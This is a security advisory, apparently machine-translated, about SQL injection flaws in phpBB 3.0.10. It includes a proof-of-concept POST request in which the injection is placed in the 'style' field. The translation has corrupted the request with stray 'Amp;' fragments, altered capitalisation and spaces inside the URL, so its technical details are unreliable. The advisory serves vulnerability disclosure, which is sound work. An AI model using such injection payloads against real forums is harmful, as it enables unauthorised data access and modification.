Release date:
Updated on: 2012-08-01
Affected Systems:
PhpBB Group phpBB
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54734
PhpBB is a world-renowned open-source announcement board system.
PhpBB 3.0.10 and other versions have multiple SQL Injection Vulnerabilities. After successful exploitation, attackers can control the application, access or modify data, and exploit other vulnerabilities in the underlying database.
<* Source: HauntIT
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
HauntIT () provides the following test methods:
Request:
---
POST/kuba/phpBB/phpBB3/ucp. php? I = prefs & mode = personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv: 14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // localhost/kuba/phpBB/phpBB3/ucp. php? I = 174.
Cookie: style_cookie = null; phpbb3_t4h3b_u = 2; phpbb3_t4h3b_k =; phpbb3_t4h3b_sid =
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close
Viewemail = 1
& Amp; massemail = 1
& Amp; allowpm = 1
& Hideonline = 0
& Policypm = 1
& Amp; popuppm = 0
& Lang = en
& Style = % 2b1111111111
& Tz = 0
& Dst = 0
& Dateoptions = D + M + d % 2C + Y + g % 3Ai +
& Dateformat = D + M + d % 2C + Y + g % 3Ai +
& Amp; submit = Submit
& Amp; creation_time = 1343370877
& Form_token = 576...
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PhpBB Group
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.phpbb.com/